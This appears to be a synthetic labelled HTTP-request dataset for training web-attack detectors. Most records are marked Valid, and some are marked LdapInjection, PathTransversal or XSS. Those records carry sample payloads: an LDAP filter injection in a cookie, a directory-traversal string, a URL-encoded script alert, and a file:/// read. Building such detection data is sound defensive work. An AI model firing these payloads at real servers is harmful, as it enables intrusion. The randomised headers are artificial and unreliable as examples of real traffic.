Proxy-Authorization: Digest algorithm=MD5
Authorization: lsrc Ezipm=8oubz
Range: -017,-1,-32
Referer: http://www.meihw.de/tpHiIatu/nNicrh/yNmrhlE/aidsl/oRAeWnr.sh
TE: trailers,chunked
Trailer: From
User-Agent: uctfxH/4.5.3.1.0
UA-CPU: 68000
UA-Disp: 2630,1668,32
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 934x7117
Via: zoes/3.0 235.135.82.75
Transfer-Encoding: compress
Upgrade: OceeiE/8.8, btin/1.3, wrUw/4.8, toehd/0.2, t0m4l/5.1
Warning: 558 194.108.196.44 "letduvqanrqo" 
X-Forwarded-For: 118.255.6.210
X-Serial-Number: 6943669939
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47671
Start - Id: 19140
class: Valid
GET /o2p/8tetaeln6woE/Jexec-CR/F2sixroanr/y.kfIQMsBdt6KbydqsA/gk5V2KB_oiMO/EktmpscriptSbgsoundM/oKHWL/7JS_yZQzj/HbSa/lutni6iarfz.bin? HTTP/1.0
Host: 222.221.72.96
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 40.88.186.196
Cookie: sz=huo;clibAbk2k=0onnf;ntDrijjj=oVIo7fYC;YmlradauNl5et=259;e2Zitdnjgtni=55426567;9ha=aaohibokan
Cookie2: $Version="78"
Date: Sun, 07 Mar 04 11:00:57 UTC
ETag: W/"eKP35ifDThMvjLc-p"
Expect: 100-continue
From: qdoirhe@1eeea.it
If-Modified-Since: Wed, 28 Jan 04 24:32:01 UTC
If-Unmodified-Since: Mon, 20 Feb 06 06:15:46 UTC
If-Match: "-7BwTbSS_cIT@VNhD3"
If-None-Match: "qYWuZ@@ozqL@bDF03I"
If-Range: *
Max-Forwards: 9189
MIME-Version: 4.9
Pragma: no-cache
Proxy-Authorization: NTLM N25qRXB5YW5BNk92Nk55aWVlbm1Dc2hzYW5heXNTd3JtaW55
Authorization: NTLM UmVldGJ4dDdBZGxobHVlc2E1YWxpdHRhaWhkaWZlTm5UbmRpdHRkc2Vu
Range: 0922-58,430-
Referer: http://hovohs.ch/gefNrkA/yo2rcs/erTicone/aeiswee/lvEen.gif
TE: trailers,trailers,chunked;q=0.5
Trailer: Accept
User-Agent: Mozilla/9.6 (compatible; Konqueror/8.1; SunOS sun4u; lZrliAast; hgR5msO; go2f)
UA-CPU: x86
UA-Disp: 070,359,16
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 047x447
Via: FTP/3.0 193.52.213.97:4703
Transfer-Encoding: eauroc; RbhSi8d=qnbpity
Upgrade: niotsE/9.5, 6anas/4.2
Warning: 420 www.actoit.htm "nyml7olireede" "Tue, 02 Nov 04 22:52:56 UTC"
X-Forwarded-For: 144.215.252.39
X-Serial-Number: 680648582
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19140
Start - Id: 25587
class: Valid
GET /ecvzdIRKHjV/rnlRg6AoKS6Jt3IXC-n/zxetbwsrihahiaiho/sock_streamlibRandCUN/oloountptnbiiaejy/etnhntnha/ujwZlPQA/dmyB/tPNEl/wwsrec0/is99F-qZX.cfm?tscayl6f=s9&dloitr0tg=71700001&cg3_-_l5X=+mepols&aucytNsA=ftelmetaexecgh&i1ssn=itelnlohlelet&oasi1g1iadmcs=96 HTTP/1.1
Host: www.hburee6l.it
Connection: vmiah
Accept: audio/x-wav;q=0.3, application/*;q=0.4, application/*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: nlckeen-acSHeE;q=0.7, cbtie2ic-DeF, Etesi-bcribD, tiorst-7syesn;q=0.9
Cache-Control: max-age=3534
Client-ip: 107.15.10.200
Cookie: mIrspaiaibfdm=gtd-30;4d=484711
Cookie2: $Version="458"
Date: Tue, 26 Feb 08 03:42:36 CET
ETag: "NNBf2owU_ntQDH3l5"
Expect: 100-continue
From: camaabz@oEUygi.cz
If-Modified-Since: Sun, 22 Feb 09 21:43:33 CET
If-Unmodified-Since: Tue, 06 Nov 07 13:48:33 CET
If-Match: "pbFbhnMpeLuxlvC"
If-None-Match: *
If-Range: Sun, 12 Jun 05 17:24:19 UTC
Max-Forwards: 801
MIME-Version: 6.8
Pragma: ae0f='c'
Proxy-Authorization: NTLM bmplYW5kMmVvaHNvb3NlZjdxdDRlZWl3Y3VkYWpha2ZiaHRzaWVUaWV5
Authorization: NTLM YWVSeW5uaWI1aHVnb29kbngzaW96N3Rybm5xVGxpemhsaG9tanRO
Range: 286-,8185-
Referer: http://www.efosr.ch/rtvczcan/8ycugu/shrio/1tdi.sh
TE: trailers,deflate,deflate
Trailer: If-Modified-Since
User-Agent: Mozilla/7.4 (compatible; Konqueror/9.3; Linux i586; fnrcr)
UA-CPU: Sparc
UA-Disp: 8439,526,16
UA-OS: Linux
UA-Color: color8
UA-Pixels: 437x001
Via: 8.0 www.enSn.jpg, HTTP/0.9 105.208.77.243
Transfer-Encoding: compress
Upgrade: ohwH/4.5
Warning: 089 33.136.50.173 "slomeeEwemt2tyii4es" 
X-Forwarded-For: 255.93.182.143
X-Serial-Number: 644521
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25587
Start - Id: 37398
class: LdapInjection
GET /Ma%uJmFIq6/sr/5AvL_Axml5yUwZY1/eehr7lMrsiej0tRet/x5c0inn5MRYaY-B7Ev/8wsxipaaqu/us8sHcer/nWwkgcGmGlA5DSr9tM1/idYXYTiJT0djgP.php?tsnOso1Ha=h8etmh0yoalimg&Tatdi=oooOaRe%26&wdndsqicotlOnzM=tn8+&de5=6382 HTTP/1.0
Host: www.3te2bStkN.com
Connection: close
Accept: audio/x-wav, image/*;q=0.4
Accept-Charset: utf-7
Accept-Encoding: *
Accept-Language: *;q=0.6
Cache-Control: max-age=00
Client-ip: 129.32.184.202
Cookie: cpa=7700863;pe3=5630)(&(objectClass=liI)(|(sn = tm)(cn=el  J*))
Cookie2: $Version="12"
Date: Sun, 25 Jan 04 02:48:34 UTC
ETag: W/"@3eZnmfNndXwGvQab"
From: boile3ls@wovnoatoto.net
If-Unmodified-Since: Fri, 26 Aug 05 10:50:51 CET
If-None-Match: *
If-Range: Mon, 27 Oct 08 02:41:13 GMT
Max-Forwards: 0
Pragma: 8iftg='iaahao'
Range: 92271-,85-
Referer: /tld7od4e/rbtne.asp
User-Agent: yaraahr/8.5.6.0
UA-Disp: 462,901,32
Via: myaor/1.6 204.175.96.66, meEa7/7.4 www.vefetXn.gif:8374
Upgrade: ontd/7.5, eEr1lt/2.5
----: ----------

null

End - Id: 37398
Start - Id: 14257
class: Valid
GET /hK/vbscriptT/mute7matimmenb7c/xhmIe/vlogUGnc/notapeeoAr/dpb_FY@nriLFriflT2x/sO_/uZF2CmNOqz/estoah/aeXpny/8EdPE.aspx?iitixwAheeu=02645854&iPtar=jmeta&hSgbrdtezcbr=qesoilteht&54pmhtlafe=la4valn&eraIo0atti=+ HTTP/1.1
Host: www.dolFsii2op.gov:80
Connection: keep-alive
Accept: */*
Accept-Charset: hz-gb-2312;q=0.4, euc-jp;q=0.3, iso-8859-8, ks_c_5601-1987, iso-8859-2
Accept-Encoding: deflate;q=0.1, deflate;q=0.9, gzip;q=0.3, deflate;q=0.8
Accept-Language: 1wp-o, reHsb-o2be, 0-haeIdla;q=0.0, uoocSn-nxohoP, naI-e4eormic
Cache-Control: no-transform
Client-ip: 110.246.2.165
Cookie: 2u1mftpgroup bysystemJ9KMreplace=uhdojerhhewr;eiwtsyui=Otsaaq@ShtW;9rnmz=otr?
Cookie2: $Version="960"
Date: Mon, 01 Jan 07 07:16:33 GMT
ETag: W/"9NYTjtyVsu4-K5pmEI4C"
Expect: spmodmww
From: faeootnr@3EygNeo.st
If-Modified-Since: Sun, 08 Jul 07 01:49:16 UTC
If-Unmodified-Since: Fri, 23 May 08 07:19:38 UTC
If-Match: "tqN08togsBE1frkY"
If-None-Match: "-@f2lg0tJEqVNT@l"
If-Range: Sat, 19 May 07 19:05:53 GMT
Max-Forwards: 780
MIME-Version: 4.0
Pragma: no-cache
Proxy-Authorization: NPoh rEbi=eefingh
Authorization: Digest uri=/nvnoeew/potb/4Eagh.txt
Range: 926-,-654
Referer: http://7fwna.com/f3xO/rrdti.jpg
TE: gzip;q=0.5,trailers,trailers
Trailer: Accept-Language
User-Agent: 3iaeopaek (gtLEE_qK; ek47I-jI; rACXt91OL; mGiAiPOO4; aP7GFcV)
UA-CPU: MIPS
UA-Disp: 985,925,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 908x0233
Via: 4.4 224.101.80.46, HTTP/9.9 www.baHubo.jpg, 1.0 218.180.88.4
Transfer-Encoding: gzip
Upgrade: fibea/9.9, zvl/0.8
Warning: 245 www.shn0o.jpg "rrtOe3dbt8i84ttada" "Mon, 10 Aug 09 22:29:45 GMT"
X-Forwarded-For: 177.22.102.112
X-Serial-Number: 4359426
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 14257
Start - Id: 12319
class: Valid
GET /lBDi4Cm8BSR./Ov4CwJD_@9t/lhnal/havingE/anVpNG@W1zm/oLNIUaI4QqZ66SD3Dt/s3/havingMESH0WHphtacces03D/ZRIvdocument.IL5lsshutdown/iyo@3E@2KbQ/2GwpsbodyTrposition-Kca.sh?lpmdbet=952352&zVS.l9id=d%3Botimgsf&ned=2Ksq5e%26nualleS&35style5iIFt0autoexeco=972&8a=e6elcnbmitlehnr&t4rsfokh=pVjoi&wlot=ynhiceo&edgrenhegIebneb=860163&aBkLlocationCJ9G=rFyq_IoGz&rinoepOnltntln=080806869&8seeilhtE=t&nihis=i%5C+y&ssrsoct72Msem=ehzuKhP&nm=lfuy&Sede=reuertl+ul HTTP/1.1
Host: 92.254.172.92:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: identity, gzip
Accept-Language: molsatr-rhf1, a-7so;q=0.0, vren-7ncd, 60-ixGxpbb;q=0.3
Cache-Control: max-age=517
Client-ip: 39.48.17.190
Cookie: FAswKUmlogtK=36185;edi=neHtr;rpwr=6
Cookie2: $Version="243"
Date: Thu, 21 Oct 04 08:24:45 GMT
ETag: W/"GCD6yUW4x1j1-IUU"
Expect: f7oteol=hAGe
From: sRsia@elenva.st
If-Modified-Since: Wed, 04 Aug 04 03:31:09 GMT
If-Unmodified-Since: Sun, 30 May 04 04:20:45 UTC
If-Match: "L.Qq-t.tqFJh6S1q1Q1e"
If-None-Match: "urmwJ23IeP097F1F"
If-Range: *
Max-Forwards: 88
MIME-Version: 6.0
Pragma: no-cache
Proxy-Authorization: Basic c3J0NDp0SWF0Zg==
Authorization: Digest qop=auth-int
Range: 38-0,5-
Referer: /ShtL/u8e4tFi1/t1dh/sMsrwl.jsp
TE: deflate;q=0.7
Trailer: Range
User-Agent: tlSasilD (fAEkl2rRr)
UA-CPU: 68000
UA-Disp: 3555,603,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 4392x5610
Via: e7reT/5.0 225.54.28.188:2, FTP/2.2 171.128.244.200, 2.0 www.xcbegxh.shtml
Transfer-Encoding: gzip
Upgrade: god/4.2, see0e0/3.6
Warning: 665 24.150.246.12 "aeenoduraB" 
X-Forwarded-For: 105.219.52.42
X-Serial-Number: 61893291117945630
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 12319
Start - Id: 44840
class: PathTransversal
GET /Sh9i9/apD8GLY_@K3MVubndr/SnQ3Ur/ietec7tisonkas9rst/o19OKfwsWeEwFvpIIZ@/cUhSBZg7pVSvUDZkjY/elizraA8agnntoiUc4a/mfhn/rfy/tethcreeY1asn/tvtdo5e3zh9Htk9/h6lDsXvgARGL.html?fetth=723874&sn1tosBahANms=collection%28+file%3A%2F%2F%2Fc%3A%2Feebj%2Fnha7v.xml%29&Iqro=rhleaEu8gbhce&vdrop6phpMlNerkvp=70465585 HTTP/1.1
Host: 112.70.20.125:944
Connection: lwruybga
Accept: */*;q=0.4
Accept-Charset: x-mac-cyrillic;q=0.7, x-mac-chinesesimp, x-mac-roman, windows-1254, x-mac-cyrillic;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=585
Client-ip: 55.4.250.85
Cookie: id=0t?aSy2akv3m;Efhnnc3hhe=59921497;Grtgtarj=nyoolocation;es=okG;aEszb=l:httve
Cookie2: $Version="393"
Date: Sun, 27 Mar 05 03:36:51 CET
ETag: W/"1jGtoTUskEbXDpBL"
Expect: 100-continue
From: eosehi@IsoiaSe.uk
If-Modified-Since: Fri, 03 Sep 04 05:55:58 CET
If-Unmodified-Since: Fri, 09 Feb 07 13:02:29 UTC
If-Match: "_F5cy_Ape-PYI7E2EApc"
If-None-Match: *
If-Range: Sun, 17 Apr 05 14:17:59 CET
Max-Forwards: 912
MIME-Version: 8.7
Pragma: rCfola=h
Proxy-Authorization: Basic bTNkZHI6aHRlcm9l
Authorization: Basic cmNkYzoydGFjb2V0
Range: 4-,8-56742
Referer: http://4szWgrO.com/nxnaj/ldohlasq/zxVsk7ta/bihn/3eem.jpg
TE: chunked,trailers,chunked;q=0.3
Trailer: From
User-Agent: Mozilla/6.0 (Windows; U; Windows NT 7.9; fe-ua; rv:2.1.9) Gecko/25166558
UA-CPU: MIPS
UA-Disp: 7018,7530,16
UA-OS: Linux
UA-Color: color16
UA-Pixels: 035x248
Via: 2.5 127.214.120.94
Transfer-Encoding: identity
Upgrade: neacoe/5.1, 7qfTia/9.7, negety/9.4, hbiry/6.4
Warning: 218 47.103.166.198 "iok3ehde4ryOr" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 13064
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44840
Start - Id: 27674
class: Valid
GET /etettayt61ambw/ihNyxyNPzCjJX/tti/n3464e1SpBQsJ/SCGU6xE8QN/9rox/5gtpb/osdo7s4sWih/WlogYftpQtMp/o7OsowerineouqniLOay/s7c13.h5dibVRM03-P/re3j2mor.cfm?dm=LzscelnteN&ufgtgePhosc6n=2uVmLQAXLX._&9SyX7Z8YPW=17&hil4=eyeambeee&miky2mDntoSgte=+processing-instructionez&eeT=lLofu&orw.crby=rd%2FtNehnhEaopen%7E&cweestt=shl&si_passthrurcpLnRm=yL_br8&sdispfe8tEAdrYe=%291randf%7Cvgstej&nVoplnea=drop&-MNjPinput=714&otdofm4eno=8000 HTTP/1.0
Host: 225.23.194.192
Connection: oIpr1Rz
Accept: */*
Accept-Charset: x-mac-greek;q=0.1
Accept-Encoding: deflate;q=0.2, identity;q=0.5, gzip;q=0.7
Accept-Language: *;q=0.1
Cache-Control: only-if-cached
Client-ip: 247.16.138.175
Cookie: tolwfwbosrio7=A;nmedoRwqrmpanw=bi)boot.ini;uhh8ovf=eetmh;YD_s.qR=85
Cookie2: $Version="8"
Date: Wed, 28 Apr 04 14:09:53 GMT
ETag: ".0HZLsvWECLFYqDWWN.f"
Expect: a1ctm9d6=ktto
From: drguoece@vffbtwio.it
If-Modified-Since: Fri, 29 Jun 07 03:55:17 CET
If-Unmodified-Since: Thu, 08 Apr 10 08:50:09 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 12 Dec 08 11:41:44 GMT
Max-Forwards: 1
MIME-Version: 9.6
Pragma: n=dqNAyy
Proxy-Authorization: Digest realm
Authorization: 2aeIa oeOxhg=slTrh
Range: -1685,0732-,-35
Referer: http://www.eoslAn0.de/drajdId/melrfe/nIto.jsp
TE: gzip,trailers,chunked
Trailer: Trailer
User-Agent: Mozilla/8.6 (Windows; U; Windows NT 7.0; zM-r0; rv:3.4.6) Gecko/74479931
UA-CPU: 68000
UA-Disp: 408,9856,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 1357x8118
Via: 4.4 www.7rr3ai0.css, FTP/3.0 www.crjt.png, HTTP/5.9 163.238.247.157
Transfer-Encoding: compress
Upgrade: fplbe/4.0, d0U/8.1, tbez1/9.2, tmorf/3.1, obhnA/2.1
Warning: 040 8.52.207.130:9769 "wsi8q4slsttilo" 
X-Forwarded-For: 24.95.0.215
X-Serial-Number: 33238976827562606065
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 27674
Start - Id: 28454
class: Valid
GET /QE1BfR1aH/tuHxE-r7m5XcYXRu/fKwhedLSP43XGTY9e9/4eq46f@/pn2Bwrylsdryaata9c/r.rQkZMAFkJJm3-X/nttm7ehcyhflennejg/oEhlCoTttgacals/lns1La6yh1U1haevk/tsaeai/t9sb.shtml?VwpjApoN=dnURnJ&xohbsmEaoqt5=+eabr&gaiLnsrknhtuso=ovzGSogzpCcT&apl=othhhca&pb5bo6tmt=n%3Dnzstdin%3FKsfnq&eqYrt=wnoe8foteh&YCC0ex=tK2BlndV&isEmaiuHhc=delmetaer%27ueh&4fe3xrgkosdvih=7491424&etaaar9=exectNimliidssdadyfwa&3nKacceptNsamSpG=eHtWByZox9G&seratw=64776654&ke5Tthodtcrt=46841116 HTTP/1.1
Host: 143.74.91.163:796
Connection: beEide
Accept: image/gif;q=0.1, audio/*
Accept-Charset: *;q=0.6
Accept-Encoding: identity;q=0.6, gzip, identity, identity
Accept-Language: i7e-5maea, bi1drQ-notg8s;q=0.5, nrT-oacru, yRA-ltcm
Cache-Control: no-transform
Client-ip: 140.124.216.219
Cookie: hvaius=syRkKOrIw;snn=ac4tiseu;oh8oTseCMrc=2524
Cookie2: $Version="165"
Date: Tue, 01 Mar 05 06:00:40 UTC
ETag: "4ohLRNGxY-E4_hL"
Expect: 100-continue
From: 3teotee@motpa.ch
If-Modified-Since: Thu, 12 Apr 07 12:15:33 UTC
If-Unmodified-Since: Sat, 31 Oct 09 10:31:53 CET
If-Match: "mvywnEfVLM58cK2lA"
If-None-Match: *
If-Range: *
Max-Forwards: 431
MIME-Version: 0.3
Pragma: 58=tlot
Proxy-Authorization: Digest nonce
Authorization: NTLM b29uY2NoZXRpY3RnZXdlbnljb2lscnZuYnNtZVJ4b2M=
Range: 571439-,36777-,4088-2
Referer: http://www.EfN4.cz/dvdoln/fyadRz.php4
TE: deflate;q=0.0,chunked;q=0.4,trailers
Trailer: Pragma
User-Agent: eiSafo/2.4
UA-CPU: 68000
UA-Disp: 0681,480,8
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 2738x559
Via: FTP/6.2 77.38.211.233, HTTP/4.9 14.48.155.29, m1nn/1.4 43.50.119.157
Transfer-Encoding: identity
Upgrade: 6taars/5.3
Warning: 966 101.43.142.203 "tcetitxnsoj" "Tue, 14 Oct 08 17:34:51 UTC"
X-Forwarded-For: 84.7.158.77
X-Serial-Number: 032993654516042
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28454
Start - Id: 26833
class: Valid
GET /egJiLactJccQre/yu.bin? HTTP/1.0
Host: 177.246.47.126:6
Connection: otb1pnay
Accept: application/x-tar;q=0.7, video/*;q=0.2
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: rzDl-frsbna;q=0.6, s-mtr, 7-iha;q=0.6, 3eefi-ey3;q=0.6
Cache-Control: wlrtb='Eiwre'
Client-ip: 145.33.237.208
Cookie: id0dSORw=saroe
Cookie2: $Version="747"
Date: Sun, 20 Sep 09 19:48:10 GMT
ETag: W/"7oGiPZehxkceqqQ"
Expect: 100-continue
From: 4ahee@onawd.st
If-Modified-Since: Mon, 22 Mar 04 19:17:56 CET
If-Unmodified-Since: Thu, 27 Oct 05 06:05:04 UTC
If-Match: "gpCReleWricwoXq@9"
If-None-Match: "rXG4zhS7RFe5Zn-Ci"
If-Range: Sat, 20 Aug 05 18:35:18 GMT
Max-Forwards: 26
MIME-Version: 8.4
Pragma: no-cache
Proxy-Authorization: NTLM ZnVuc05kbGRnSGVudmF0YjdzYmhsbmVhYXFlbTFudHRvbGpibWxrbHpwdG1FZWk=
Authorization: NTLM eWtpcmYzZWFzaGVmbEVyamVSd2N0cmhhaGljZXcwN3JvTkFhM2EwRWlyNmprcA==
Range: -6214
Referer: http://isLm.ch/odanaen/aaiorif/etm5w/kHetne/aean3a.zip
TE: gzip;q=0.3,deflate;q=0.5,chunked;q=0.3
Trailer: Connection
User-Agent: we7Oasst/7.1
UA-CPU: StrongARM
UA-Disp: 5606,5500,16
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 9604x4951
Via: heTa/9.7 www.ynlhbtg.htm:535
Transfer-Encoding: ihisH; bslsR10e=Asdtig9
Upgrade: advoos/2.4, 1dhv/7.1
Warning: 341 www.nnmq.png "nnserre1png8hew8e" 
X-Forwarded-For: 225.193.121.240
X-Serial-Number: 333154589
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26833
Start - Id: 47229
class: XSS
GET /rBvUL1tS2D_Nx6F/gE5gMJ/6ahiooirthhcoao/M4Kloe8WHY/PYe.yexecsUPJcmd/bsgbeafopenebhlad/a@LEminput9F.jVKqint.nsf?eaiectseyd9tt=58&lpaStwtsdxc=d0S1XicuZed9&gtRnbXrRestoo=1rl8C_cEd&ehuoacea=91&kEtMmaem=838&US1lMhMU=%26%7B%5Balert%28%27rdkt%27%29%3B%5D%7D%3B HTTP/1.0
Host: 140.210.50.2
Connection: skriiSEp
Accept: text/*;q=0.8, text/html;q=0.7
Accept-Charset: windows-1252, iso-8859-15, x-mac-roman, koi8;q=0.0, euc-kr;q=0.2
Accept-Encoding: 
Accept-Language: etecmoem-dBu;q=0.6
Cache-Control: x=eThme
Client-ip: 226.163.167.76
Cookie: 69Xl=o4zldb0Bbq;tlxg=2sl2aN;eee4baemsoi=ibZXVXx46
Cookie2: $Version="98"
Date: Fri, 12 Nov 04 01:41:59 UTC
ETag: "3M5PzY4fxhZpNvBVJEK"
Expect: 100-continue
From: oreAv@osmi3u.be
If-Modified-Since: Sun, 11 Mar 07 12:02:40 GMT
If-Unmodified-Since: Tue, 31 May 05 15:52:47 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 01 Apr 10 23:20:28 GMT
Max-Forwards: 995
MIME-Version: 6.8
Pragma: no-cache
Proxy-Authorization: Basic bW5kZ2VrbmU6dWVja2FoaXA=
Authorization: Digest realm
Range: 60-99
Referer: /iEeeih3t/ocsutn.tar.gz
TE: gzip
Trailer: TE
User-Agent: 7WhXKh http://www.3lpevre.be
UA-CPU: 68000
UA-Disp: 390,072,32
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 7301x0518
Via: HTTP/7.8 www.3ett6.jpg, 0.9 73.56.31.83, HTTP/1.2 www.shuamr.js
Transfer-Encoding: deflate
Upgrade: unbL/8.1, luoi/0.0, jgsmeh/0.8
Warning: 809 www.usatae.gif "ooabotEle" 
X-Forwarded-For: 16.107.252.123
X-Serial-Number: 736758197053618
----: ------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47229
Start - Id: 44852
class: PathTransversal
GET /n2n3xcrsmrmmiq/aaavRyeri/EUnwatfv1hdnh/ei82lxywIB/jiyo7wro2ezsa/lsgeshciEkaktz/lru8o/mKg/hrcaaerute5iif5oe/ronlstrrcbjG.shtml?Fa0efsOEeL=.%2F..%2F..%2F..%2F..%2F..%2F HTTP/1.1
Host: 99.86.99.132
Connection: close
Accept: */*
Accept-Charset: windows-874, koi8, iso-10646-ucs-2;q=0.1, euc-tw;q=0.6
Accept-Encoding: 
Accept-Language: *;q=0.5
Cache-Control: min-fresh=45
Client-ip: 99.178.36.179
Cookie: smaebcmeto=9646
Cookie2: $Version="261"
Date: Wed, 04 Aug 04 18:11:16 UTC
ETag: W/"2Hr_1mB_sXpKsq.@5EV"
Expect: 100-continue
From: tAozEH@Asmp.net
If-Modified-Since: Sat, 22 Dec 07 07:14:14 UTC
If-Unmodified-Since: Mon, 12 Feb 07 22:41:03 UTC
If-Match: *
If-None-Match: "Kv48-x9@np51l82"
If-Range: Wed, 30 Nov 05 09:04:19 GMT
Max-Forwards: 8753
MIME-Version: 4.8
Pragma: ceolihoa='hui'
Proxy-Authorization: Basic MG5lZXNrc3Q6Zmtab3ZsczE=
Authorization: Basic YURvZWU6cG5uNG53bnI=
Range: 3752-,303-8,-33345
Referer: /siolb9xa/whqoy9.htm
TE: chunked,chunked;q=0.6
Trailer: From
User-Agent: Mozilla/7.7 (compatible; uefm8i; Open BSD i386; eenemtM)
UA-CPU: StrongARM
UA-Disp: 5979,4863,8
UA-OS: Win98
UA-Color: color16
UA-Pixels: 458x842
Via: 6.2 www.enpseeu.css, HTTP/4.2 www.ecuta.tiff
Transfer-Encoding: identity
Upgrade: elir/9.8, ylr/3.8, e0ge7/5.0, Son/5.8, deHi3/3.2
Warning: 141 5.122.155.98 "97dso" 
X-Forwarded-For: 211.195.184.12
X-Serial-Number: 65016581
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44852
Start - Id: 31532
class: Valid
GET /lRh0/lemn70oeEwiefs/ihOgL.php?HSR2HlibzW=5&TI5b=ojdqraYrU&rUu7yuecOt8n=a%29s&VEAkfSl4F=e%27&oEJKElsyL=c%24&nepRei=9t9Icim&2Bitbrbtvycnekn=tkdVaqpM.k&ks=515910&aaecexd=63095211&a3esrIws=5013&noaftyleoTledA=eh9Et3hnSiy&wTaTo=7928371&eneALpkc9rn=uh&itee5=1701767&vsmtj3I=uYPYq4neVkI8 HTTP/1.0
Host: www.emvaifawb.net
Connection: keep-alive
Accept: video/*;q=0.1
Accept-Charset: iso-8859-5, windows-1252;q=0.8, windows-1251;q=0.8, x-mac-ce;q=0.8
Accept-Encoding: *
Accept-Language: mitDtas-o8al;q=0.9, ed1jl4-b, n4altc-nraqn, Ksfnh-heejTbl;q=0.5
Cache-Control: n39abK=outc
Client-ip: 238.106.85.159
Cookie: tRJghollinku=aWsO_t9j;etnmDeartna=8;ycdxarestBp=k f:;~;xf2Rldec=4693685
Cookie2: $Version="2"
Date: Thu, 16 Nov 06 16:39:36 UTC
ETag: "1OPgRCT_WsRtsYTzTr"
Expect: 100-continue
From: oscuvS@ncnhq.com
If-Modified-Since: Mon, 19 Apr 10 08:09:46 GMT
If-Unmodified-Since: Mon, 23 Jan 06 02:31:04 UTC
If-Match: "grG7ADa7uXv0lBM3"
If-None-Match: "Bl3.9vDfoqG4BNs_"
If-Range: "Dm89PbnMsX_K9k24"
Max-Forwards: 5677
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic aXllb0VjTjpydDdWc2Fp
Range: -89812,-061835,42050-159934
Referer: http://8irtnav.com/2omPrsYt/whreN.png
TE: gzip;q=0.5
Trailer: User-Agent
User-Agent: atAselRsfe (huDm15C)
UA-CPU: 68000
UA-Disp: 5662,024,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 362x515
Via: 0.7 www.e1nzsz.tiff, FTP/3.9 www.nPeTa2c.shtml, 9.4 222.33.181.222
Transfer-Encoding: tm2sd
Upgrade: Csis5m/6.9, opoe/5.3, nade/2.1, dtOer/1.5, et7ss/5.5
Warning: 339 84.153.145.230 "Yjaemotaeri5e" "Thu, 30 Jul 09 22:22:43 UTC"
X-Forwarded-For: 81.227.175.207
X-Serial-Number: 5515370509152
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31532
Start - Id: 2677
class: Valid
GET /ox9T20nlb_vGt2oeo/yftpGZK5Xncnyk-/1FU6d7/qxwaUistyleroptN-obi/ELP6/iwAhD1L6/mA.iSB110dz0dP/dg/pOHeih8qmhyR5cdazrs/dm7tq1bV945tx.css? HTTP/1.1
Host: 106.128.143.17
Connection: t6ivnh
Accept: */*;q=0.8
Accept-Charset: x-mac-icelandic;q=0.1, euc-kr;q=0.0, cp-936;q=0.9, iso-8859-2, x-mac-japanese;q=0.7
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=32
Client-ip: 97.1.7.203
Cookie: AyrcAitftbnnlo=EjrmfamegitEelobjecto;Gnetcate@zpzNm=eaA
Cookie2: $Version="21"
Date: Mon, 14 Aug 06 16:02:48 GMT
ETag: W/"YgfCl574zFZDDyBiItIN"
Expect: 100-continue
From: ovamHuqy@MlywzI.fr
If-Modified-Since: Sat, 01 Nov 08 12:12:37 GMT
If-Unmodified-Since: Fri, 06 Apr 07 10:03:26 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 26 Sep 09 21:43:45 UTC
Max-Forwards: 9
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Basic MUVsdDoxb3NlY29mZQ==
Authorization: Basic bnZydTpoemxl
Range: -23,-6679
Referer: /ateeri1o/etbqnyev/xh8anai.mdb
TE: trailers,deflate
Trailer: Expect
User-Agent: Mozilla/2.7 (X11; U; Unix 1.3; ne-sa; rv:0.9.6) Gecko/39119286
UA-CPU: x86
UA-Disp: 6089,3163,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 486x934
Via: 1.8 www.aredte.htm, 1.6 www.2LdtrUEa.jpg, ttfk0Q/5.2 www.ahcHEs.jpeg
Transfer-Encoding: identity
Upgrade: azkuh/4.3, ztter/5.6, EyResi/1.5, vTvy/8.8
Warning: 749 www.okXda0.jpeg:63 "nQde" 
X-Forwarded-For: 94.59.133.217
X-Serial-Number: 8136074594585
----: ---------------------------------------------
